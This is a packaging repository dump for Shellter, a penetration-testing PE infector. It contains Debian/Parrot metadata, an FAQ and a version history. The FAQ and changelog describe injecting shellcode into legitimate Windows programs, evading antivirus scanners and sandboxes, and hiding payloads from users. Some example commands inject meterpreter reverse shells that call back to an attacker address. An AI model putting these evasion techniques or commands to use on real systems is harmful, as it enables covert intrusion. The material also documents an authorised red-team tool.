├── Executable_SHA-256.txt ├── debian ├── changelog ├── compat ├── control ├── copyright ├── docs ├── helper-script │ └── shellter ├── install ├── rules ├── source │ └── format └── watch ├── docs ├── faq.txt ├── readme.txt └── version_history.txt ├── licenses ├── BeaEngine.png ├── BeaEngine_License.txt └── Shellter_License.txt ├── shellcode_samples ├── calc ├── calcenc ├── info.txt ├── krb1 └── krb3 └── shellter.exe /Executable_SHA-256.txt: -------------------------------------------------------------------------------- 1 | ea07a52eca82b6383c7aa224652e55e0d1701f0779def736977ecadff819049c -------------------------------------------------------------------------------- /debian/changelog: -------------------------------------------------------------------------------- 1 | shellter (7.2-0parrot1) rolling-testing; urgency=medium 2 | 3 | * Import Kali version into Parrot. 4 | 5 | -- Lorenzo "Palinuro" Faletra Wed, 04 Mar 2020 15:26:44 +0100 6 | 7 | shellter (7.2-0kali1) kali-dev; urgency=medium 8 | 9 | * Import new upstream release (fixes 6033) 10 | 11 | -- Sophie Brun Sun, 23 Feb 2020 09:53:09 +0100 12 | 13 | shellter (7.1-0kali5) kali-dev; urgency=medium 14 | 15 | * Add dependents to kali-defaults 16 | 17 | -- Ben Wilson Wed, 17 Jul 2019 12:49:23 +0100 18 | 19 | shellter (7.1-0kali4) kali-dev; urgency=medium 20 | 21 | * Update helper-script 22 | 23 | -- Ben Wilson Fri, 21 Jun 2019 19:38:15 +0100 24 | 25 | shellter (7.1-0kali3) kali-dev; urgency=medium 26 | 27 | * Switch to kali_winexec 28 | 29 | -- Ben Wilson Thu, 13 Jun 2019 10:59:47 +0100 30 | 31 | shellter (7.1-0kali2) kali-dev; urgency=medium 32 | 33 | * Switch install location 34 | 35 | -- Ben Wilson Tue, 11 Jun 2019 17:17:53 +0100 36 | 37 | shellter (7.1-0kali1) kali-dev; urgency=medium 38 | 39 | * Import new upstream release 40 | 41 | -- Sophie Brun Fri, 23 Feb 2018 10:40:42 +0100 42 | 43 | shellter (7.0-0kali1) kali-dev; urgency=medium 44 | 45 | * Import new upstream release 46 | 47 | -- Sophie Brun Wed, 19 Jul 2017 15:24:03 +0200 48 | 49 | shellter (6.9-0kali1) kali-dev; urgency=medium 50 | 51 | * Import new upstream release 52 | 53 | -- Sophie Brun Tue, 28 Feb 2017 09:37:31 +0100 54 | 55 | shellter (6.8-0kali1) kali-dev; urgency=medium 56 | 57 | * Import new upstream release 58 | 59 | -- Sophie Brun Thu, 12 Jan 2017 16:27:33 +0100 60 | 61 | shellter (6.5-0kali1) kali-dev; urgency=medium 62 | 63 | * Import new upstream release 64 | * Update the helper-script (see #792695) 65 | 66 | -- Sophie Brun Thu, 08 Sep 2016 14:03:42 +0200 67 | 68 | shellter (4.0-0kali1) kali-dev; urgency=medium 69 | 70 | * Import new upstream release 71 | * Update the helper-script for kali-dev and sana (command wineconsole doesn't 72 | exist anymore) 73 | 74 | -- Sophie Brun Fri, 17 Jul 2015 15:35:50 +0200 75 | 76 | shellter (3.1-0kali3) kali-dev; urgency=medium 77 | 78 | * Fix helper-script (manage args) 79 | 80 | -- Sophie Brun Wed, 03 Jun 2015 08:12:52 +0200 81 | 82 | shellter (3.1-0kali2) kali; urgency=medium 83 | 84 | * Use wineconsole instead of wine in helper-script 85 | * Fix debian/copyright 86 | 87 | -- Sophie Brun Tue, 02 Jun 2015 14:22:01 +0200 88 | 89 | shellter (3.1-0kali1) kali; urgency=low 90 | 91 | * Initial packaging for kali (Closes: 0001851) 92 | 93 | -- Sophie Brun Mon, 01 Jun 2015 16:07:15 +0200 94 | -------------------------------------------------------------------------------- /debian/compat: -------------------------------------------------------------------------------- 1 | 9 2 | -------------------------------------------------------------------------------- /debian/control: -------------------------------------------------------------------------------- 1 | Source: shellter 2 | Section: non-free/misc 3 | Priority: optional 4 | Maintainer: Parrot Dev Team 5 | Uploaders: Lorenzo "Palinuro" Faletra 6 | Build-Depends: debhelper (>= 10) 7 | Standards-Version: 3.9.8 8 | Homepage: https://www.shellterproject.com/ 9 | Vcs-Git: https://nest.parrot.sh/packages/tools/shellter.git 10 | Vcs-Browser: https://nest.parrot.sh/packages/tools/shellter 11 | 12 | Package: shellter 13 | Architecture: i386 amd64 14 | Depends: wine, 15 | ${shlibs:Depends}, 16 | ${misc:Depends}, 17 | Description: Dynamic shellcode injection tool and dynamic PE infector 18 | Shellter is a dynamic shellcode injection tool aka dynamic PE infector. It can 19 | be used in order to inject shellcode into native Windows applications 20 | (currently 32-bit apps only). The shellcode can be something yours or 21 | something generated through a framework, such as Metasploit. 22 | . 23 | Shellter takes advantage of the original structure of the PE file and doesn't 24 | apply any modification such as changing memory access permissions in sections 25 | (unless the user wants to), adding an extra section with RWE access, and 26 | whatever would look dodgy under an AV scan. 27 | -------------------------------------------------------------------------------- /debian/copyright: -------------------------------------------------------------------------------- 1 | Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ 2 | Upstream-Name: shellter 3 | Source: https://www.shellterproject.com/ 4 | 5 | Files: * 6 | Copyright: 2013-2016 Kyriakos Economou 7 | License: special 8 | License Agreement 9 | ==================== 10 | This software makes use of the "BeaEngine Disassembler" library. 11 | . 12 | This license was updated the 26th of February 2017. 13 | . 14 | Disclaimer 15 | ----------- 16 | This software is created with the sole purpose to assist ethical hackers 17 | in their daily jobs during Penetration Testing and/or Red Team 18 | engagements. The author of this software and Insainted Ltd assume no 19 | responsibility for any unlawful actions taken and any damages caused by 20 | using this software. 21 | . 22 | Terms of Use 23 | ============== 24 | . 25 | 1) You can use this software and share it with anyone as long as you do 26 | this for free and you respect all the following terms. 27 | . 28 | 2) You assume full responsibility for any damage caused by this software 29 | either this applies to you or to someone else. 30 | . 31 | 3) You assume full responsibility for any unlawful actions taken by using 32 | this software. 33 | . 34 | 4) You are allowed to modify this software, but if you do then you have to 35 | explicitly state so in case you share it with other people. 36 | . 37 | 5) You are allowed to reverse engineer it, disassemble it, debug it, for 38 | any reason that might be, but in case you find a bug then please report it 39 | to the author and give him the necessary amount of time to fix it before 40 | disclosing it. 41 | . 42 | 6) You are allowed to distribute this software from your own website, but 43 | if you do then you have to include a link to its original source along 44 | with this license agreement. 45 | . 46 | 7) You are allowed to use this software for work purposes, but you are not 47 | allowed to charge for it. This means that you have the right to use it as 48 | a complementary tool to assist you at work for business purposes, but you 49 | are not allowed to use it in situations that fall in the following two cases 50 | (a and b) without the written agreement of its author. 51 | . 52 | a. You are not allowed to build a commercial service based on this 53 | software. 54 | b. You are not allowed to integrate this software with any other 55 | software, unless it's for private usage and does not violate the previous 56 | term. 57 | . 58 | 8) You are not allowed to use this software to gain unauthorized access to 59 | a computer system or network without a written agreement of its owner. 60 | . 61 | 9) You are not allowed to build any type of public software such as 62 | ‘tools’, ‘scripts’, ‘applications’, and ‘frameworks’, that are using 63 | and/or referencing this software without the written agreement of its 64 | author. 65 | 66 | Files: BeaEngine* 67 | Copyright: Copyright (c) 2009 , BeatriX 68 | License: LGPL-3 69 | This library is free software; you can redistribute it and/or modify 70 | it under the terms of the GNU Lesser General Public License version 3 as 71 | published by the Free Software Foundation. 72 | . 73 | This library is distributed in the hope that it will be useful, 74 | but WITHOUT ANY WARRANTY; without even the implied warranty of 75 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 76 | GNU Lesser General Public License for more details. 77 | . 78 | You should have received a copy of the GNU Lesser General Public License 79 | along with this program. If not, see 80 | . 81 | On Debian systems, the complete text of the GNU Lesser General 82 | Public License version 3 can be found in "/usr/share/common-licenses/LGPL-3". 83 | 84 | Files: debian/* 85 | Copyright: 2015 Sophie Brun 86 | License: GPL-2+ 87 | This package is free software; you can redistribute it and/or modify 88 | it under the terms of the GNU General Public License as published by 89 | the Free Software Foundation; either version 2 of the License, or 90 | (at your option) any later version. 91 | . 92 | This package is distributed in the hope that it will be useful, 93 | but WITHOUT ANY WARRANTY; without even the implied warranty of 94 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 95 | GNU General Public License for more details. 96 | . 97 | You should have received a copy of the GNU General Public License 98 | along with this program. If not, see 99 | . 100 | On Debian systems, the complete text of the GNU General 101 | Public License version 2 can be found in "/usr/share/common-licenses/GPL-2". 102 | -------------------------------------------------------------------------------- /debian/docs: -------------------------------------------------------------------------------- 1 | docs/faq.txt 2 | docs/readme.txt 3 | -------------------------------------------------------------------------------- /debian/helper-script/shellter: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | cd /usr/share/windows-resources/shellter/ 4 | wine shellter.exe $@ 5 | -------------------------------------------------------------------------------- /debian/install: -------------------------------------------------------------------------------- 1 | debian/helper-script/* usr/bin/ 2 | shellter.exe usr/share/windows-resources/shellter/ 3 | Executable_SHA-256.txt usr/share/windows-resources/shellter/ 4 | shellcode_samples/ usr/share/windows-resources/shellter/ 5 | licenses/Shellter_License.txt usr/share/doc/shellter/ 6 | -------------------------------------------------------------------------------- /debian/rules: -------------------------------------------------------------------------------- 1 | #!/usr/bin/make -f 2 | 3 | %: 4 | dh $@ 5 | 6 | override_dh_installchangelogs: 7 | dh_installchangelogs docs/version_history.txt 8 | -------------------------------------------------------------------------------- /debian/source/format: -------------------------------------------------------------------------------- 1 | 3.0 (quilt) 2 | -------------------------------------------------------------------------------- /debian/watch: -------------------------------------------------------------------------------- 1 | version=4 2 | opts="user-agent=firefox" 3 | https://www.shellterproject.com/earlier-versions/ .*/shellter_v(\d.*)\.zip 4 | -------------------------------------------------------------------------------- /docs/faq.txt: -------------------------------------------------------------------------------- 1 | 2 | 1) Does the execution flow return to normal after executing the payload? 3 | ========================================================================= 4 | 5 | Shellter V (v5.0) introduces the Stealth Mode feature which preserves the 6 | original functionality of the application while it keeps all the benefits 7 | of dynamic PE infection. 8 | 9 | As mentioned also below, when you use the Stealth Mode feature you need to 10 | set the payload exit function to 'Thread', when you prepare the multi-handler 11 | listener in metasploit, otherwise the process will be terminated when you kill 12 | the session. 13 | 14 | For more information on how to use Stealth Mode effectively, please read the 15 | readme.txt document. 16 | 17 | 18 | 19 | 2) Does the process die after the payload is executed? 20 | ======================================================= 21 | 22 | This actually depends on how the payload behaves. 23 | 24 | If you use the Stealth Mode feature, then you must always set the exit 25 | function for the payload to 'Thread' so that it won't kill the process 26 | when it returns. In this case the process will still run. 27 | 28 | If you don't use the Stealth Mode feature, then if the exit function is 29 | set to 'Process', the payload will kill the process, otherwise the program 30 | will most probably crash. 31 | Keep in mind that this will happen after the execution of the payload, or 32 | after killing the reverse connection, so in any case this doesn't affect 33 | the effectiveness of the injected code. 34 | 35 | For more information on how to use Stealth Mode effectively, please read the 36 | readme.txt document. 37 | 38 | 39 | 40 | 3) How long does it take to execute the payload? 41 | ================================================= 42 | 43 | Normally, this happens instantly, unless you have injected into a point in 44 | the execution flow that requires user interaction with the application in order 45 | to be reached. 46 | 47 | Furthermore, when junk polymorphic code is used then this delays the execution 48 | of the payload. In Stealth Mode the delay is not significant. 49 | However, when Stealth Mode is not used the execution of the effective payload 50 | can be delayed by several seconds. 51 | 52 | This delay is good in order to bypass AV emulation engines and sandboxes that 53 | normally only monitor the process for a limited time. You don't have to use 54 | this feature if you don't want to. However, it can significantly contribute 55 | towards AV evasion. -------------------------------------------------------------------------------- /docs/readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ParrotSec/shellter/5abeb33888e07da5156eaad848ffdf21ed5678e4/docs/readme.txt -------------------------------------------------------------------------------- /docs/version_history.txt: -------------------------------------------------------------------------------- 1 | Shellter v1.0 2 | ............... 3 | 4 | Released 27d/5m/2014 5 | 6 | 7 | 8 | 9 | Shellter v1.1 10 | ............... 11 | 12 | Released 21d/06m/2014 13 | 14 | [+] Added Advanced/Basic Mode Selection 15 | 16 | [+] Verify that PE image file is indeed a native 32-bit application. 17 | 18 | [+] Minor changes in error notifications. 19 | 20 | [+] Internal source code optimizations. 21 | 22 | 23 | 24 | 25 | Shellter v1.2 26 | ............... 27 | 28 | Released 06d/07m/2014 29 | 30 | [+] Fixed file share permissions conflicts when injecting to some installers 31 | (NSIS). 32 | 33 | Reported by : James Chapman 34 | 35 | [+] Added user notification if EntryPoint is not located in the first section. 36 | 37 | [+] Internal optimizations. 38 | 39 | 40 | 41 | 42 | Shellter v1.3 43 | ............... 44 | 45 | Released 26d/07m/2014 46 | 47 | [+] Added timed tracing in Basic Mode. 48 | Shellter will trace a random number of instructions, for a maximum time of 49 | approximately 30 seconds. 50 | 51 | 52 | 53 | 54 | Shellter v1.4 55 | ............... 56 | 57 | Released 28d/07m/2014 58 | 59 | [+] Fixed not showing logo issue when running Shellter in low resolution. 60 | 61 | Reported by: Nikolaos Tsapakis 62 | 63 | 64 | 65 | 66 | Shellter v1.5 67 | ............... 68 | 69 | Released 02d/08m/2014 70 | 71 | [+] Fixed a potential error issue during process creation. 72 | 73 | [+] Added CREATE_NEW_CONSOLE flag to avoid I/O issues when tracing console 74 | applications. 75 | 76 | [+] Fixed a potential invalid pointer dereference issue when parsing a malformed 77 | PE file. 78 | 79 | 80 | 81 | 82 | Shellter v1.6 83 | ............... 84 | 85 | Released 04d/08m/2014 86 | 87 | [+] Fixed a potential uninitialized variable access issue. 88 | 89 | [+] Minor updates in PE file validation method. 90 | 91 | [+] Other minor updates/optimizations. 92 | 93 | 94 | 95 | 96 | Shellter v1.7 97 | ............... 98 | 99 | Released 06d/08m/2014 100 | 101 | [+] Minor updates/optimizations. 102 | 103 | 104 | 105 | 106 | Shellter v1.7 Wine Beta #1 107 | ............................ 108 | 109 | Released 12d/08m/2014 110 | 111 | [+] Native Windows & Wine/CrossOver Compatible. 112 | 113 | [+] Optimized tracer. 114 | Up to 3 times faster when tracing over code that makes frequent 115 | calls to functions outside the PE image. Testing has been applied 116 | using this build vs the Windows-Only build by tracing the same PE 117 | target for a relatively big number of instructions. 118 | 119 | [+] Removed tracing option: 'Start Trace from EntryPoint/System DLL'. 120 | This option was mostly for testing and it will probably be replaced 121 | with another. 122 | This option is still available in the Windows-Only compatible build. 123 | 124 | Known issues: In some cases, the tracer might return RMEM_ERROR_02 and stop 125 | tracing.You can still use the traced execution flow up to that 126 | point and proceed with the injection stage. 127 | I am currently trying different approaches to solve issues that 128 | might influence the tracing stage, even though these are quite 129 | rare. These issues don't apply in the Windows-Only compatible 130 | build. 131 | 132 | 133 | 134 | 135 | Shellter v1.8 136 | ............... 137 | 138 | Released 01d/11m/2014 139 | 140 | [+] Merged Native Windows & Windows/Wine Tracing Engines. 141 | 142 | [+] Added command line support for the Basic Mode. 143 | Start Shellter using '--h' argument to get more information regarding 144 | the supported arguments. 145 | 146 | [+] Added option to choose Tracing Engine. Only applies under Native Windows.* 147 | 148 | [+] Removed tracing option: 'Start Trace from EntryPoint/System DLL'. 149 | 150 | Knows issues: See notes in the previous update regarding the Windows/Wine 151 | tracing engine. These issues don't apply when choosing the 152 | Native Windows tracing engine. 153 | 154 | *Note: When running under Wine, the Tracing Engine is selected automatically. 155 | 156 | 157 | 158 | 159 | Shellter v1.9 160 | ............... 161 | 162 | Released 22d/11m/2014 163 | 164 | [+] Automated usage of encoded-payload handlers in Basic Mode. 165 | Even when operating under Basic Mode, Shellter will take 166 | advantage of this feature that was only available from 167 | Advanced Mode so far. 168 | Shellter will only change section's permissions if the PE 169 | target doesn't support any of the available methods, or if 170 | the user changes this setting from the cmdline. 171 | 172 | 173 | 174 | [+] Enhanced cmdline support. 175 | Allows the user to customise Basic Mode operation and make 176 | use of some features and options that were previously only 177 | available in Advanced Mode. 178 | 179 | *Note: When using the Basic Mode with cmdline flags, if an 180 | encoded payload is specified then the user needs to set 181 | both the '--enc' flag as well as the '--handler'. 182 | Start Shellter using '--h' to see how to use the cmdline 183 | options. 184 | 185 | [+] Fixed a potential read-out-of-bounds issue in the cmdline 186 | parser. 187 | 188 | [+] Minor UI and internal optimizations. 189 | 190 | 191 | 192 | 193 | Shellter v2.0 194 | ............... 195 | 196 | Released 16d/12m/2014 197 | 198 | [+] Added user notification about the minimum required Win 199 | OS version for the target PE. 200 | This allows the user to avoid situations where he makes 201 | use of an application that will not run properly in the 202 | victim host in case there is an earlier version of 203 | Windows. 204 | 205 | [+] Enhanced UI with more user-friendly output. 206 | 207 | [+] Cmdline updates. 208 | Changed help menu switch to '-h' and '--help', and verbose 209 | mode to '-v'. 210 | 211 | [+] Completely removed manual tracing engine selection. 212 | Shellter will pick up the appropriate one depending on 213 | whether you run it in a native Windows host or in Wine. 214 | This means that the user is no longer allowed to select 215 | the Wine compatible engine when running Shellter in a 216 | native Windows host. 217 | 218 | [+] All-threads tracing option is not shown as 'Beta' feature. 219 | 220 | [+] Various optimizations in both tracing engines. 221 | 222 | [+] Updated Wine/Crossover compatible tracing engine. 223 | Solved compatibility issues with some applications, and 224 | some known issues that were mentioned in the previous 225 | updates. 226 | 227 | [+] Fixed a shared access violation issue that occurred sometimes 228 | when updating the CheckSum field in the PE header. 229 | This issue didn't affect the rest of the injection process. 230 | 231 | [+] Added an icon in the executable. 232 | 233 | 234 | 235 | 236 | Shellter v2.1 237 | ............... 238 | 239 | Released 01d/02m/2015 240 | 241 | [+] Fixed a couple of potentially bug causing issues. 242 | 243 | [+] Added several extra checks to enhance error handling during 244 | injection stage. 245 | 246 | [+] Displays the name of the PE section where the shellcode was 247 | injected. 248 | 249 | [+] Minor updates/optimizations. 250 | 251 | 252 | 253 | 254 | Shellter v2.2 255 | ............... 256 | 257 | Released 07d/02m/2015 258 | 259 | [+] Automatic Backup of the original PE file. 260 | 261 | [+] Minor changes in error-display notifications. 262 | 263 | 264 | 265 | 266 | Shellter v3.0 267 | ............... 268 | 269 | Released 18d/05m/2015 270 | 271 | [+] Polymorphic IAT type handlers for encoded payloads. 272 | This is a major upgrade which dramatically enhances 273 | polymorphism in the final output. This feature breaks 274 | down the stubs of those handlers and binds them with 275 | thread context aware polymorphic code. 276 | 277 | [+] Introduced Auto/Manual mode selection. 278 | This was a necessary change since the originally called 279 | 'Basic' mode was far from basic for some time now. 280 | So Basic/Advanced mode selection has been dropped. 281 | 282 | [+] Introduced injection verification stage. 283 | After successful injection, Shellter will verify that the 284 | first instruction of the injected code will be reached 285 | successfully. 286 | If polymorphic code has been added, then the first instruction 287 | refers to that and not to the effective payload. 288 | 289 | [+] Introduced '--polyIAT' switch and the option to obfuscate 290 | the chosen IAT type handler in 'Auto' and 'Manual' modes 291 | respectively. 292 | They both take advantage of the same feature. 293 | 294 | *Note: When using Auto mode without cmdline arguments, this 295 | feature is enabled by default. 296 | If cmdline arguments are used, the aforementioned 297 | switch has to be set to enable this feature. 298 | 299 | [+] When using Shellter with Wine, the associated operation 300 | mode is not shown as 'Beta' anymore. 301 | 302 | [+] Several optimizations in adjusting IAT type handlers. 303 | 304 | [+] Several internal design optimizations. 305 | 306 | [+] Some minor changes/updates/optimizations. 307 | 308 | 309 | 310 | 311 | Shellter v3.1 312 | ............... 313 | 314 | Released 30d/05m/2015 315 | 316 | [+] Automatic adjustment of the console fonts when running Shellter 317 | in Windows >= Vista. Applies also in Wine with the appropriate 318 | settings. 319 | 320 | [+] Shellter console is now automatically positioned at the centre 321 | of the main monitor. 322 | 323 | 324 | [+] Fixed a typo in IAT handler obfuscation stage: T.C.A was showing 325 | as C.T.A. 326 | 327 | [+] Displays the amount of time elapsed during IAT handler obfuscation. 328 | 329 | 330 | 331 | 332 | Shellter v4.0 333 | ............... 334 | 335 | Released 05d/07m/2015 336 | 337 | [+] Custom Proprietary Encoder. 338 | This a major upgrade that facilitates direct usage of non-encoded 339 | payloads generated by metasploit, or created by the user. 340 | Shellter will apply its own random dynamic encoding layer and will 341 | generate every time a new decoder based on that. 342 | Cmdline switch: --encode 343 | 344 | [+] Polymorphic Decoder. 345 | Shellter can apply an extra layer of obfuscation over the generated 346 | decoder by using thread context aware polymorphic code. 347 | Cmdline switch: --polydecoder 348 | 349 | [+] Dynamic Thread Context Keys. 350 | Another major upgrade and unique feature of Shellter. This feature 351 | automates the usage of dynamic thread context information of the 352 | original execution flow of the application as encoding keys. 353 | Cmdline switch: --DTCK 354 | 355 | [+] Reflective DLL loaders support. 356 | Another major upgrade feature which allows the user not just to 357 | use raw shellcode, but even an entire DLL file that contains a 358 | a reflective loader function. 359 | The user can even choose to encode the entire DLL by using Shellter's 360 | proprietary encoder as mentioned above. 361 | Feature suggested by: Tom Wilson 362 | Cmdline switch: --reflective 363 | 364 | [+] Embedded Payloads. 365 | This new feature, allows the user to make use of some commonly used 366 | payloads without the need to generate them through metasploit. 367 | The user can choose to apply Shellter's encoder as mentioned above. 368 | It is always recommended to use encoded payloads. If a payload is 369 | not encoded, like those embedded in Shellter, then encode it through 370 | Shellter by using the --encode cmdline switch. 371 | 372 | Payloads List 373 | ------------- 374 | [1] meterpreter_reverse_tcp 375 | [2] meterpreter_reverse_http 376 | [3] meterpreter_reverse_https 377 | [4] meterpreter_bind_tcp 378 | [5] shell_reverse_tcp 379 | [6] shell_bind_tcp 380 | [7] WinExec 381 | 382 | Examples: -p meterpreter_reverse_tcp --port 5656 --ip 192.168.0.6 383 | -p winexec --cmd calc.exe 384 | 385 | [+] Enhanced injection selection point. 386 | This feature enhances the randomization regarding the injection point 387 | when using Shellter in Auto mode. 388 | 389 | [+] Extra cmdline switches. 390 | 391 | --list: Shows a list of the embedded payloads. 392 | 393 | --encode: Apply Shellter's encoder over the payload. 394 | 395 | --polydecoder: Obfuscate the generated decoder by using thread context 396 | aware polymorphic code. 397 | 398 | --DTCK: Experimental feature that uses dynamic thread context information 399 | from the original execution flow of the target PE as keys for 400 | payload encoding. 401 | 402 | --reflective : Marks the submitted payload as a DLL and defines 403 | the function name of the reflective loader. 404 | 405 | --ip: Specifies the IPv4 address used by the reverse connection payloads. 406 | 407 | --port: Specifies the port number used by the reverse and bind connection 408 | payloads. 409 | 410 | --cmd: Specifies the cmdline argument for the WinExec payload. 411 | 412 | [+] All threads tracing is now enabled by default even when cmdline is used. 413 | Specifying '--trace all' is now obsolete. However, the user can choose 414 | to only trace the main thread by specifying '--trace main' in the cmdline. 415 | However, this is not recommended. 416 | 417 | [+] Increased console buffer when using Shellter under Wine. The user can now 418 | scroll up the console output and review the available information. 419 | 420 | [+] Fixed a bug that occasionally caused wrong adjustment of some injected 421 | random Call instructions during IAT handler obfuscation. This bug was 422 | eventually triggered with calc.exe and notepad.exe only when the 423 | aforementioned feature was used, so it took some time to realize its 424 | existence. 425 | 426 | [+] Various optimizations, changes, and bug fixes. 427 | 428 | 429 | 430 | 431 | Shellter V 432 | ............ 433 | 434 | Released 08d/08m/2015 435 | 436 | [+] Stealth Mode. 437 | This is a major upgrade that combines dynamic PE infection with a RedTeam 438 | functionality. This means that while you are not losing any of the unique 439 | benefits of the dynamic PE infection that Shellter provides, you can also 440 | preserve the original functionality of the infected application. 441 | This means, that the application will run as it should, while the execution 442 | of the payload is completely transparent to the user. 443 | When you enable this feature, Shellter automatically enables its own encoder 444 | and IAT type handling. In a few words, when Stealth Mode is enabled the --enc, 445 | --encode, and handler --IAT flags are automatically set. So you don't have to 446 | specify them yourself. 447 | 448 | Example: shellter -f -p --stealth --polydecoder 449 | --polyiat --junk 450 | 451 | Example: shellter -f -p meterpreter_reverse_tcp --port 4545 452 | --ip 192.168.0.6 --stealth --polyIAT --polyDecoder --junk 453 | 454 | Important: Take a look at the documentation of this feature in readme.txt, 455 | before using it. 456 | 457 | [+] Dynamic Injection of Multiple Payloads. 458 | Thanks to the combination of the Stealth Mode with the dynamic PE infection 459 | that Shellter provides, you can infect multiple times the same PE file using 460 | different payloads as long as you always enable the Stealth Mode feature. 461 | 462 | For example, you can inject a "meterpreter_reverse_tcp" stager and then 463 | infect again the same PE file with an "Add User" payload, and so on. 464 | Every layer of infection will be using a unique dynamic approach with a 465 | different encoding, a randomly picked up IAT handler, and extra obfuscation 466 | if you choose to apply this by using the --polyDecoder and --polyIAT 467 | switches. In addition, you can use the --junk switch to add some extra junk 468 | polymorphic code. 469 | 470 | [+] Added -s / --stealth command line switches to enable Stealth Mode when 471 | using Shellter from the command line. 472 | 473 | [+] Added option to enable Stealth Mode feature from the Manual Mode, and from 474 | the Auto Mode when command line arguments have not been used. 475 | 476 | [+] Deletes dropped Disasm.dll when Shellter terminates normally. 477 | 478 | [+] Various updates, fixes, optimizations. 479 | 480 | 481 | 482 | 483 | Shellter V [5.1] 484 | .................. 485 | 486 | Released 12d/08m/2015 487 | 488 | [+] Fixed a shared-access-violation issue during injection stage, which was 489 | occasionally caused by a Close/Open file handle race condition when Stealth 490 | Mode was enabled. 491 | 492 | [+] Fixed an issue with the embedded WinExec payload which would cause the 493 | process of the infected PE file to be terminated after the execution of the 494 | payload had finished, even though Stealth Mode was used. 495 | 496 | [+] Default time tracing in Auto Mode is 30 seconds when using Shellter inside 497 | native Windows hosts and 60 seconds when using Shellter in Wine. I decided 498 | to increase the tracing time in the second case because the whole tracing 499 | process is much slower in Wine. In this way we manage to compensate against 500 | the slower tracing speed that is inevitable when we use Shellter in Wine. 501 | 502 | [+] Minor changes, fixes, optimizations. 503 | 504 | 505 | 506 | 507 | Shellter V [5.2] 508 | .................. 509 | 510 | Released 11d/10m/2015 511 | 512 | [+] Added domain names support for the embedded Meterpreter_Reverse_HTTP/HTTPS 513 | payloads. 514 | Note: You can always use domain names even with payloads not embedded in 515 | Shellter. You just need to generate the payload in raw format so that 516 | you can feed it to Shellter as a file. This was always supported. 517 | 518 | [+] Introduced the --lhost switch for specifying the attacker's server by IP or 519 | domain name. 520 | 521 | [+] The --ip switch has been dropped (see above). 522 | 523 | [+] Introduced --examples switch to show usage examples which were previously 524 | shown in the help menu. 525 | 526 | [+] Enhanced command line parser. 527 | Added some extra checks over the supported arguments. Shellter will notify 528 | the user in case a switch/option specified is either not supported or 529 | potentially not used correctly. 530 | 531 | [+] Fixed a design issue that wouldn't allow the user to choose one of the 532 | embedded payloads if the name was mistyped in the command line. In that 533 | case Shellter would only accept a payload from a file. This has now been 534 | fixed so that if the user mistyped either the name of the embedded payload 535 | or the name of the file containing the payload data; Shellter will always 536 | give the option to choose again between a listed or a custom one. 537 | 538 | [+] Fixed a potential usage of an unitialized pointer while reading the payload 539 | data from a file when specific settings were enabled. 540 | 541 | [+] A few updates/corrections in the documentation (readme.txt) file. 542 | 543 | [+] Various internal updates and optimizations. 544 | 545 | 546 | 547 | 548 | Shellter V [5.3] 549 | .................. 550 | 551 | Released 24d/10m/2015 552 | 553 | [+] Enhanced 'Junk' and 'Thread Context Aware' Polymorphic code generation 554 | engines. More instructions are now supported for a more randomized 555 | output. 556 | 557 | [+] Ultra fast polymorphic code generation. 558 | 559 | [+] Tracing Engine modifications. 560 | Up to version 5.2 Shellter would keep tracing the main thread even if more 561 | than one threads were created while the user had chosen to trace only the 562 | main one. This could potentially cause some issues, since during execution 563 | flow filtering Shellter would be not aware of what and where was executed 564 | in another thread. 565 | From version 5.3 if the user chooses to only trace the main thread, or log 566 | dynamic thread context information to use dynamic thread context keys, then 567 | once a new thread is created Shellter will exit the tracing stage in order 568 | to be able to provide more reliable results during the execution flow 569 | filtering. 570 | In Auto Mode All-Threads-Tracing is enabled by default, but if command line 571 | is used, then it can be disabled using the '--trace main' switch. 572 | In Manual Mode, Shellter will ask the user to choose between the two. 573 | 574 | [+] Fixed a design error that was introduced by a recent update which would 575 | allow a user to specify an empty 'CMD' command string when the embedded 576 | WinExec payload was used. 577 | 578 | [+] Various internal updates and optimizations. 579 | 580 | 581 | 582 | 583 | Shellter V [5.4] 584 | .................. 585 | 586 | Released 31d/10m/2015 587 | 588 | [+] User Defined Encoding Sequence. 589 | This feature allows the user to optionally choose a personalised encoding 590 | scheme based on the supported encoding operators. 591 | In Manual Mode, Shellter will ask the user to enable this feature or not. 592 | In Auto mode, this feature is only available through the command line by 593 | extending the --encode switch with the encoding sequence between '{}'. 594 | When the user specifies the encoding sequence in Manual mode, then the 595 | '{}' characters must not be entered. 596 | 597 | Auto mode - Command line Example: --encode {!^+} 598 | 599 | Manual mode - Enter Encoding Sequence: !^+ 600 | 601 | When Auto mode is used through the command line, if the user only sets the 602 | --encode switch without specifying an encoding scheme, Shellter will build 603 | its own random encoding sequence as it was done until now. 604 | Note: Before using this feature, it is recommended that you read about it 605 | in the documentation regarding Shellter's proprietary encoder. 606 | This feature should only be used by advanced users. 607 | 608 | [+] Help menu updates. 609 | 610 | [+] A few updates/corrections in the documentation (readme.txt) file. 611 | 612 | [+] Updated usage examples with proper explanation on the given command line. 613 | Run shellter with the --examples switch to display them. 614 | 615 | [+] Various internal updates and optimizations. 616 | 617 | 618 | 619 | 620 | Shellter V [5.5] 621 | .................. 622 | 623 | Released 31d/10m/2015 624 | 625 | [+] Fixed an error in the user-defined-encoded-sequence parser that would make 626 | Shellter recognize valid sequences as invalid, thus making this feature 627 | unusable from Manual mode. 628 | 629 | Reported by: @fancy__04 630 | 631 | [+] Updated the XOR encoding operator from '^' to 'x'. 632 | The original operator was fine when testing this new feature from visual 633 | studio, but apparently using the '^' character in Windows command prompt 634 | is really a bad idea. I totally forgot about this since, Visual Studio 635 | uses the command line as a parameter to CreateProcess(), which in that 636 | case there is no issue. The impact was that the XOR operations were 637 | eliminated from the supplied encoding sequence when using the command 638 | line. 639 | 640 | Example using the new XOR operator: --encode {!x-x+} 641 | 642 | [+] Applied all relevant documention updates. 643 | 644 | 645 | 646 | 647 | Shellter V [5.6] 648 | .................. 649 | 650 | Released 07d/11m/2015 651 | 652 | [+] Added an extra verification check over the user-defined-encoding-sequence 653 | feature that checks for insecure concatenations of encoding operators. 654 | It aims to protect this feature from being used in a totally wrong way. 655 | However, it is still recommended that this feature should only be used by 656 | advanced users. 657 | 658 | [+] Fixed an error in the user-defined-encoding-sequence buffer initialization 659 | which could cause later to ignore the user supplied sequence and trigger 660 | the random encoding scheme generation 